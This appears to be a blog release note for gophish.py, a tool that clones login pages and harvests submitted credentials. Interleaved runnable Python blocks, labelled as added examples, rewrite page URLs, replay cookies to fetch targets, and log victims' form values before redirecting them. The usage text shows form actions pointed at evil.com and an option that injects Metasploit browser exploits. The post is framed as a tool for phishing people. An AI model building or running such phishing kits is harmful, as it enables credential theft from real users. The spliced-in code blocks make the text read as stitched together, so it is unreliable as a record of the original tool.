Gophishing Update – Enhanced Clickthrough and More

I’ve released a new version of Gophish.py. The update includes:

  • Fixed a bug in rewriting the method attribute in phished forms
  • Fixed a bug with GET based forms
  • Fixed a bug in the autofill option, fixed the demo/sample file accordingly
  • Fixed a bug where links were rewritten when using ‘javascript:…’
  • Fixed some bugs regarding correctly closing files
  • Added functionality to undo BeautifulSoup’s rewriting of ‘&’ to ‘&amp;’
  • Added functionality to rewrite ‘url(…)’ references in CSS
  • Added functionality to strip onsubmit/onkeypress/onclick attributes from FORM/INPUT tags
  • Added a feature to pass a User-Agent header when connecting to the target
  • Added a feature to send cookies
  • Added a feature to serve a click through page after form submission
  • Added a ‘clickable’ option to serve additional click through pages after the initial click through page

Quite a few bugs were fixed, one of which has been around from the beginning. In some cases, the METHOD attribute of FORM tags wasn’t correctly rewritten, breaking form submission functionality.

Besides the bug above, which has existed for some time, I also fixed some bugs introduced by more recent versions of the script. The code was restructured in a fairly early release, and at that time forms using a METHOD of ‘GET’ were broken. Redirection is now implemented the same way for both methods: after the submitted values are logged, gophish serves an HTML page containing a form, auto-generated from the submitted values, that JavaScript submits to the real site as soon as the page loads.

I updated the code to use ‘soup.prettify(formatter="html")’ in order to fix some issues with unescaped characters and malformed HTML. This broke the autofill functionality. I have now updated that functionality as well as the sample file.

I also updated the link rewriting functionality to ignore links using ‘javascript:…’. Previous versions rewrote these to ‘replacementurl/javascript:…’, which broke them.

In some cases, files opened by gophish weren’t correctly closed, which broke the script after the first connection. This is now fixed.

The first “feature” I added is more of a fix. BeautifulSoup, when using ‘formatter="html"’, tries to fix bad HTML by closing some tags and escaping ‘&’ as ‘&amp;’, ‘<’ as ‘&lt;’ and ‘>’ as ‘&gt;’. The last two are fine, but escaping ‘&’ also hits entities that were already present in the page: an existing ‘&nbsp;’ becomes ‘&amp;nbsp;’, so the text ‘&nbsp;’ is printed on the rendered page. I now undo this after BeautifulSoup does its thing.

The next enhancement rewrites ‘url(…)’ references in the CSS within the page, such as ‘url(www.example.com)’. A relative value such as ‘url(/path/to/file)’ is now rewritten to the correct absolute URL, so stylesheet assets keep loading when the page is served from the phishing host.

In addition, I added functionality to strip onsubmit/onkeypress/onclick attributes from FORM/INPUT tags, since those handlers in some cases break submission of the form to the phishing server. Those attributes are now rewritten to be empty.
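The two rewriting rules above (leave ‘javascript:’ and similar non-URL values alone; resolve relative ‘url(…)’ and link values against the page they came from) are small enough to show end to end. The following is an added example, not gophish’s own code: gophish does this with BeautifulSoup, whereas this block uses regular expressions so it runs without any third-party package. The target URL and the sample markup are constructed for the example.

```python
import re
from urllib.parse import urljoin

# Values that are not navigable URLs. Prefixing them with a site URL is
# exactly the 'replacementurl/javascript:...' breakage described above.
_PASSTHROUGH = ("javascript:", "data:", "mailto:", "tel:", "about:", "#")


def absolutize(value, page_url):
    """Resolve a href/src/url() value taken from the cloned page against the
    URL the page was fetched from, so it still points at the right place
    once the page is served from the phishing host."""
    v = value.strip()
    if not v or v.lower().startswith(_PASSTHROUGH):
        return value
    # urljoin handles absolute URLs (returned unchanged), protocol-relative
    # '//host/x' and relative paths including '../' in one place.
    return urljoin(page_url, v)


# url(x), url('x') or url("x"), with optional whitespace inside the parens.
_CSS_URL = re.compile(r"""url\(\s*(?P<q>['"]?)(?P<u>.*?)(?P=q)\s*\)""",
                      re.IGNORECASE | re.DOTALL)

# Quoted href="x" / src='x' attributes. 'action' is deliberately excluded:
# form actions are pointed at the phishing server, not at the original site.
_HTML_URL = re.compile(r"""(?P<a>\b(?:href|src)\s*=\s*)(?P<q>['"])(?P<u>.*?)(?P=q)""",
                       re.IGNORECASE | re.DOTALL)


def rewrite_css_urls(css, page_url):
    """Rewrite every url(...) in a stylesheet or a style attribute."""
    def repl(m):
        q = m.group("q")
        return "url(%s%s%s)" % (q, absolutize(m.group("u"), page_url), q)
    return _CSS_URL.sub(repl, css)


def rewrite_html_urls(markup, page_url):
    """Rewrite quoted href/src attributes in a page. The regex does not see
    unquoted attributes; a real HTML parser (as gophish uses) would."""
    def repl(m):
        return "%s%s%s%s" % (m.group("a"), m.group("q"),
                             absolutize(m.group("u"), page_url), m.group("q"))
    return _HTML_URL.sub(repl, markup)


if __name__ == "__main__":
    page = "https://www.victim.com/login.php"   # constructed target URL
    print(rewrite_css_urls("body{background:url('/img/bg.png')}", page))
    print(rewrite_html_urls('<a href="javascript:void(0)">x</a>'
                            '<img src="../logo.png">', page))
```

Note that a bare ‘url(www.example.com)’ with no scheme is, to a browser and to urljoin alike, a relative path, so it resolves under the original site rather than to example.com; only values with a scheme or a leading ‘//’ are treated as absolute.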

Now the fun stuff: features. The first one seems like a no-brainer. You can now pass a file containing a ‘User-Agent’ header value to gophish. The new option is ‘--useragent filename.txt’, assuming the user agent file you are using is named ‘filename.txt’. This resolves cases where the site, based on the User-Agent sent by Python, responds with a “Browser not supported” page instead of the page you want to phish.

The next feature is simple and I am unsure if it will ever be necessary. In some cases, a site might check that JavaScript is enabled by setting a cookie and then validating that the cookie has in fact been set. If JavaScript is disabled, the page might respond differently. There is now a ‘--sendcookies’ option to resolve this potential problem. This option causes gophish to make an initial connection to the page, grab the cookies, and then make a second request with those cookies added to the HTTP headers.
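Both fetch-side options are easy to exercise against a local stand-in for the target. The block below is an added example, not gophish’s own code: ‘fetch_page’ does the User-Agent override and the two-request cookie replay as described above, and ‘_DemoSite’ is a constructed target that serves a “Browser not supported” page to Python’s default User-Agent and only shows its login form once the cookie it set comes back. The cookie name, the form and the port handling are assumptions made for the example.

```python
import http.cookiejar
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def fetch_page(url, user_agent=None, send_cookies=False):
    """Fetch the page to phish the way --useragent and --sendcookies are
    described: with an optional User-Agent header, and optionally as two
    requests where cookies set by the first are replayed on the second."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    headers = {"User-Agent": user_agent} if user_agent else {}

    def get():
        req = urllib.request.Request(url, headers=headers)
        with opener.open(req, timeout=5) as resp:
            return resp.read().decode("utf-8", "replace")

    body = get()
    if send_cookies:
        # HTTPCookieProcessor stored any Set-Cookie from the first response
        # in `jar` and attaches those cookies to this second request.
        body = get()
    return body


class _DemoSite(BaseHTTPRequestHandler):
    """Constructed stand-in for a target login page (not a real site)."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if ua.startswith("Python-urllib"):        # urllib's default UA
            self._reply("<p>Browser not supported</p>")
        elif "jscheck=1" not in self.headers.get("Cookie", ""):
            # First visit: set the 'JavaScript check' cookie and stall.
            self._reply("<p>Please enable JavaScript</p>",
                        extra=[("Set-Cookie", "jscheck=1; Path=/")])
        else:
            self._reply('<form method="POST" action="/login.php">'
                        '<input name="user">'
                        '<input name="pass" type="password"></form>')

    def _reply(self, body, extra=()):
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        for name, value in extra:
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_demo_site():
    """Start the constructed target on an ephemeral port; returns its URL."""
    server = HTTPServer(("127.0.0.1", 0), _DemoSite)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/login.php" % server.server_address[1]


if __name__ == "__main__":
    url = start_demo_site()
    ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"
    print(fetch_page(url))                                  # not supported
    print(fetch_page(url, user_agent=ua))                   # enable JavaScript
    print(fetch_page(url, user_agent=ua, send_cookies=True))  # the login form
```

The second request is only useful if the first one actually set something; when the jar stays empty the replay just costs one extra round trip, which is why the option is off unless you ask for it.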

Now for the fun stuff. I’ve added real click through support with new options. The first option is ‘--clickthrough clickpage.html’, assuming the first click through page you want to use is named ‘clickpage.html’. This changes gophish’s behaviour: instead of logging the submitted form values and redirecting to the real page (resubmitting the values there), it serves the ‘clickpage.html’ file. So you can have the initial phish page followed by a secondary fake post-login page, for example.

The next option, ‘--clickable’, builds on this functionality. You can provide additional HTML files, comma delimited, that are served based on their name. So, if you passed in ‘--clickthrough clickpage.html --clickable page1.html,page2.html,page3.html’ for example, the flow would be:

  1. User accesses initial phish page, fills in form data, and submits
  2. Submitted data is logged and then user is served ‘clickpage.html’
  3. If ‘clickpage.html’ also has a form with an action of ‘page1.html’ and the user submits it, they are served ‘page1.html’, which was provided with the ‘--clickable’ option.
  4. Or, if there are other links for the user to click on with href=’page2.html’ and href=’page3.html’, then when the user clicks one of these links they are served the respective page.
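To make the two post-submission flows concrete, here is an added example (not gophish’s own code) of the decision the server makes once a form comes in: the default auto-submitted redirect form described earlier, and the clickthrough/clickable routing just listed. The class and function names, the in-memory log format, the sample page contents and the submitted values are all constructed for the example.

```python
import html
import time
from urllib.parse import parse_qs


def autosubmit_form(action, fields, method="POST"):
    """Build the redirect page used in the default flow: a form carrying the
    captured values that JavaScript submits to the real site as soon as the
    page loads. Works for GET and POST forms alike, since the browser builds
    the query string for a GET form itself. Values are HTML-escaped so a
    submitted quote or angle bracket cannot break out of the attribute."""
    inputs = "\n".join(
        '<input type="hidden" name="%s" value="%s">'
        % (html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in fields.items())
    page = ('<!DOCTYPE html><html><body onload="document.forms[0].submit()">\n'
            '<form method="%s" action="%s">\n%s\n'
            '<noscript><input type="submit" value="Continue"></noscript>\n'
            '</form></body></html>')
    return page % (method, html.escape(action, quote=True), inputs)


class PhishFlow:
    """Decides the response to each request after the cloned page has been
    served, following the --clickthrough/--clickable behaviour described
    above. `clickthrough` is the HTML served after the first submission (or
    None for the default redirect); `clickable` maps a requested file name
    to the HTML served for it."""

    def __init__(self, phish_url, log, clickthrough=None, clickable=None,
                 method="POST"):
        self.phish_url = phish_url      # real form target (the --phish URL)
        self.log = log                  # list standing in for --logfile
        self.clickthrough = clickthrough
        self.clickable = clickable or {}
        self.method = method            # METHOD of the cloned form

    def respond(self, method, path, body=""):
        """Return (status, html). `body` is the raw
        application/x-www-form-urlencoded request body of a POST."""
        name = path.lstrip("/").split("?", 1)[0]
        if method == "POST":
            fields = {k: v[0] for k, v in
                      parse_qs(body, keep_blank_values=True).items()}
            # Every submission is logged here, including forms on
            # clickthrough pages (a second-stage page asking for an OTP,
            # say); that is this example's choice, not a documented one.
            self.log.append({"time": time.strftime("%Y-%m-%d %H:%M:%S"),
                             "path": path, "fields": fields})
            if name in self.clickable:          # form on a clickthrough page
                return 200, self.clickable[name]
            if self.clickthrough is not None:   # first submission
                return 200, self.clickthrough
            # Default flow: forward the victim, and the values, to the real site.
            return 200, autosubmit_form(self.phish_url, fields, self.method)
        if name in self.clickable:              # a link such as href="page2.html"
            return 200, self.clickable[name]
        return 404, "<p>Not found</p>"


if __name__ == "__main__":
    log = []
    flow = PhishFlow("https://www.victim.com/login.php", log,
                     clickthrough='<h1>Welcome</h1><form method="POST" '
                                  'action="page1.html"><input name="otp"></form>',
                     clickable={"page1.html": "<p>Thanks, one moment.</p>",
                                "page2.html": "<p>Account settings</p>"})
    print(flow.respond("POST", "/login.php", "user=alice&pass=s%26cret"))
    print(flow.respond("POST", "/page1.html", "otp=123456"))
    print(flow.respond("GET", "/page2.html"))
    print(log)
    print(PhishFlow("https://www.victim.com/login.php", []).respond(
        "POST", "/login.php", "user=bob&pass=%3Cb%3E")[1])
```

With ‘--landing’ the default branch would send the victim to a chosen page instead of the real site; that is a one-line change to the final return, and the clickthrough branches are unaffected by it.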

These new features greatly enhance the functionality of your phishing page while remaining simple to use and implement. I hope someone out there finds them useful.

The new version of the code can be found here. The updated autofill sample file can be found here. A sample user agent file can be found here.

Updated usage information for the script:

  usage: gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE]
                  [--listen LISTEN] [--port PORT] [--ssl]
                  [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]
                  [--autopwn AUTOPWN] [--autofill AUTOFILL]
                  [--redirect REDIRECT] [--redirectto REDIRECTTO]
                  [--landing LANDING] [--clickthrough CLICKTHROUGH]
                  [--clickable CLICKABLE] [--useragent USERAGENT]
                  [--sendcookies]

  Automatically setup a phishing site.

  optional arguments:
    -h, --help            show this help message and exit
    --phish PHISH         the full URL to phish back to the victim (must include
                          http(s)://) (default: None)
    --replace REPLACE     the IP/FQDN to replace FORM actions with (must include
                          http(s):// and final /) (default: None)
    --logfile LOGFILE     log file to store submitted form values (default:
                          phishlog.txt)
    --listen LISTEN       the IP to bind to (default: 0.0.0.0)
    --port PORT           the port to start the listening web server on
                          (default: 80)
    --ssl                 enable SSL on the running port (default: 0)
    --sslchain SSLCHAIN   certificate chain file to use when ssl option is
                          enabled (default: chain.crt)
    --sslcert SSLCERT     certificate file to use to use when ssl option is
                          enabled (default: ssl.crt)
    --sslkey SSLKEY       private key file to use to use when ssl option is
                          enabled (default: ssl.key)
    --autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to
                          inject as an iFrame (default: None)
    --autofill AUTOFILL   file to use to autosubmit autocomplete fields
                          (default: None)
    --redirect REDIRECT   redirect requests for this address somewhere else
                          (default: None)
    --redirectto REDIRECTTO
                          redirect requests in the redirect option to this
                          address (full link, must include http(s)://) (default:
                          www.google.com)
    --landing LANDING     redirect to this landing page instead of original site
                          after form is submitted (include full link) (default:
                          None)
    --clickthrough CLICKTHROUGH
                          file to serve up after user enters form credentials on
                          main phish page (default: None)
    --clickable CLICKABLE
                          used in combination with clickthrough, comma separated
                          list of files to serve based on requested name
                          (default: None)
    --useragent USERAGENT
                          file to use to pass a user agent value in the request
                          (default: None)
    --sendcookies         initiate a connection, get the cookies, send cookies
                          back in second connection (default: 1)

  Example: gophish.py --phish https://www.victim.com/login.php --replace
    https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt
    --sslkey ssl.key

 
Happy Phishing!
